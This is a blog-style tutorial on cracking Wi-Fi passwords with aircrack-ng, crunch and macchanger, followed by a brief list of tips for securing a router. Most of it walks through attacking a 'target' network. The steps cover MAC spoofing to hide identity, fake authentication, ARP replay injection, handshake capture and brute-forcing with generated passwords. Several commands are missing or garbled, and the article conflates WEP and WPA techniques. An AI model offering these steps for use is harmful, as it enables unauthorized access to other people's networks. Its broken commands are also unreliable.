How to hack Wi-Fi using aircrack-ng without Wordlist
Hacking and securing Wi-Fi
In this project we will know about Wi-Fi networks and crack them using Aircrack-ng on Linux machine and see if your wifi network can be hacked before you run out of wordlist space.
And later we will learn some countermeasures to protect our Wi-Fi networks from these types of attacks.
What is Wi-Fi ?
Wi-Fi is a technology that allows networking of two or more systems without using wires, and shares files and internet between them.
- A system with 802.11 bg WLAN driver and hardware.
- A Linux Operating System. (eg. Kali Linux, Parrot security OS or other Linux OS)
- Aircrack-ng, Crunch and macchanger.
Fire up your system.
Turn on your Computer with any Linux OS and login as root user. If your PC doesn’t have inbuilt Wireless adapter then you have to arrange a seprate 802.11 bg wireless adapter.
Install all required tools in your system by typing this
apt-get install aircrack-ng && apt-get install crunch && apt-get install macchanger
If these tools are already installed then this will not be installed and we can continue to next step.
Starting Aircrack-ng suite on correct interface
Disconnect from any wi-fi network and open terminal and type
to check IEE6 802.11 radio interface present on your system. If it doesn’t show mon0 interface then aircrack-ng will not run. But if mon0 is present, you can continue to next step. Type-
airmon-ng start mon0
This will start aircrack-ng suite on mon0 interface.
Hide your identity
Open a new terminal and type-
ifconfig mon0 down macchanger -r mon0 ifconfig mon0 up
Check Wireless networks around you
Let it load for 30-40 seconds and then terminate it by pressing Ctrl+C. This will show some wireless networks with their
- Routers mac (BSSID)
- Channel (CH)
- Encoding (ENC)
- Amount of data Transferred (#DATA)
- Name of the network (ESSID).
Preparing to crack
Check which network have most data transfer rate. The more data transfer rate the more chances to crack it successfully.
Open new terminal. Run this command with BSSID and CH of your target.
airodump-ng -c CH –bssid BSSID -w testfile mon0
Testfile is just a random name from which aircrack-ng will extract password, any name can be choosen.
This command will tell aircrack-ng to get ready to attack that particular BSSID on that CH using passwords from testfile.
Open new terminal and type this command with BSSID of your target-
Aireplay-ng -1 1 -a BSSID mon0
This will request target’s router to accept packets from our system and make a request loop.
Wait till it shows “Auth Sucessfull” .
Arp poisoning (ARP spoofing)
ARP (Address Resolution Protocol) poisoning is the wireless attack which sends ARP messages to a local area network.
This results in the linking of an attacker’s MAC address with the IP address of a legitimate computer or server on the network. Open new terminal and type this command with BSSID of target-
aireplay -3 -b BSS ID mon0
Leave it and open new terminal
The Final Step
We used testfile as our password file so command would be-
And password will be start cracking and soon it will show you the correct password.
We used testfile as our password file and suppose if the password is minimum 8 and maximum 12 words long and contains a-b 0-9 and #@ (may take terabytes of space before actually cracking the password, if you know exact length of password that would be helpful, for example command~ crunch 8 8 | will take only 2 mb). so type the command with BSSID of your target-
Crunch 8 12 abcdefghijklmnopqrstuvwxyz1234567890#@ | aircrack-ng –bssid BSSID -w- testfile_01.cap
soon it will show you the correct password.
How to secure your Wi-Fi?
- Always use encryption for your wireless network. WEP encryption is quite easy to crack, WPA2_PSK encryption is a must.
- Change your router’s default SSID and passwords. Use complex password with random combination of Uppercase and Lowercase letters, Numbers and special characters.
- The Maximum character limit for WPA2_PSK encryption is 63. So use your imagination and make your password long as possible. Longer password is harder to crack.
- Reboot your router time to time. It can cause trouble for hacker 😉
- No need of MAC address filtering as it’s easy to bypass, WPA2 encryption is enough.
That’s it Folks! Share it if you liked this article. See you in the Next article.